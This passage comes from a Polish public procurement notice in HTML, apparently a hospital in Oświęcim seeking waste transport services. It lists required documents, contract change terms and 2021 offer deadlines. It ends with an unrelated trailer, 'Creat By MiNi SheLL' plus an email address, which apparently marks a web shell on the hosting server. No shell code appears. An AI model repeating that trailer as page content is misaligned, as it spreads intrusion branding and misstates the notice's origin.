r., poz. 779) w zakresie podmiotu transportującego odpady.<br/>4) Dokumenty potwierdzające, że posiadane przez Wykonawcę pojazdy spełniają normy emisji spalin<br/>deklarowane przez Wykonawcę (o ile spełnienie normy nie wynika z treści dowodów rejestracyjnych) –<br/>zgodne ze złożonym oświadczeniem nr 3a do SWZ<br/>5) Wykaz pojazdów dostępnych Wykonawcy usług w celu realizacji zamówienia wraz z informacją o<br/>podstawie dysponowania tymi zasobami - zgodnie z załącznikiem nr 6 do SWZ;<br/>6) Kserokopie dowodów rejestracyjnych pojazdów przewidzianych do realizacji usługi wykazanych w<br/>wykazie pojazdów - zgodnie z wykazem pojazdów przedstawionym w zał. nr 6 do SWZ.<br/>7) Dowód potwierdzający legalizację wagi, na której ważone będą odpady (Dowodem legalizacji wagi,<br/>na której ważone będą odpady może być specjalna naklejka holograficzna umieszczona na wadze w<br/>pobliżu tabliczki znamionowej, zawierająca wymagane przepisami prawa oznaczenia lub kserokopia<br/>potwierdzona za zgodność z odpisem dokumentu potwierdzająca legalizację wagi)- zgodne ze<br/>złożonym oświadczeniem nr 3a do SWZ<br/>8) Dokumenty potwierdzające, że usługa wskazana w wykazie w oświadczeniu (zał. nr 3a do SWZ)<br/>została wykonana należycie i prawidłowo ukończona.<br/>Dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz<br/>którego usługi zostały wykonane, a jeżeli w uzasadnionych przyczyn o obiektywnym charakterze<br/>Wykonawca nie jest w stanie uzyskać tych dokumentów – inne dokumenty. Wykaz wraz z dowodami<br/>powinien potwierdzać warunek określony w Dziale VIII pkt 1a niniejszej SWZ.<br/>Wykonawca, który polega na zdolnościach podmiotów udostępniających zasoby składa wraz z ofertą<br/>zobowiązanie tego podmiotu do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji<br/>zamówienia. Zobowiązanie potwierdza, że stosunek łączący Wykonawcę z podmiotami<br/>udostępniającymi zasoby gwarantuje rzeczywisty dostęp do tych zasobów oraz w szczególności<br/>określa:<br/>1) zakres dostępnych wykonawcy zasobów podmiotu udostępniającego zasoby;<br/>2) sposób i okres udostępnienia Wykonawcy i wykorzystania przez niego zasobów podmiotu<br/>udostępniającego te zasoby przy wykonywaniu zamówienia;<br/>3) czy i w jakim zakresie podmiot udostępniający zasoby, na zdolnościach którego Wykonawca polega<br/>w odniesieniu do warunków udziału w postępowaniu dotyczących wykształcenia, kwalifikacji<br/>zawodowych lub doświadczenia, zrealizuje usługi, których wskazane zdolności dotyczą.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> a) oświadczenie Wykonawcy – załącznik nr 4 do SWZ. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> a) oświadczenie Wykonawcy – załącznik nr 4 do SWZ. <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> • Oświadczenie dotyczące warunków udziału w postępowaniu – załącznik nr 3a do SWZ.<br/>• oświadczenie o posiadaniu ważnego ubezpieczenia odpowiedzialności cywilnej–<br/>oświadczenie Załącznik nr 10 do SWZ. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Zgodnie z zapisami działu XV SWZ. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> § 9<br/>1. Wszelkie zmiany niniejszej Umowy wymagają formy pisemnej pod rygorem nieważności<br/>poprzez sporządzenie podpisanego przez strony aneksu do umowy.<br/>2. Zmiana postanowień niniejszej umowy może być dokonana przez strony zgodnie z zapisami<br/>art. 455 ust. 1 pkt 2 do 4 oraz art. 455 ust.2 ustawy Prawo zamówień publicznych (t.j. Dz. U. z<br/>2021 r., poz. 1129 ze zm). <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-11-26 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://szpitaloswiecim.ezamawiajacy.pl/servlet/HomeServlet</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-11-26 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-12-25</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com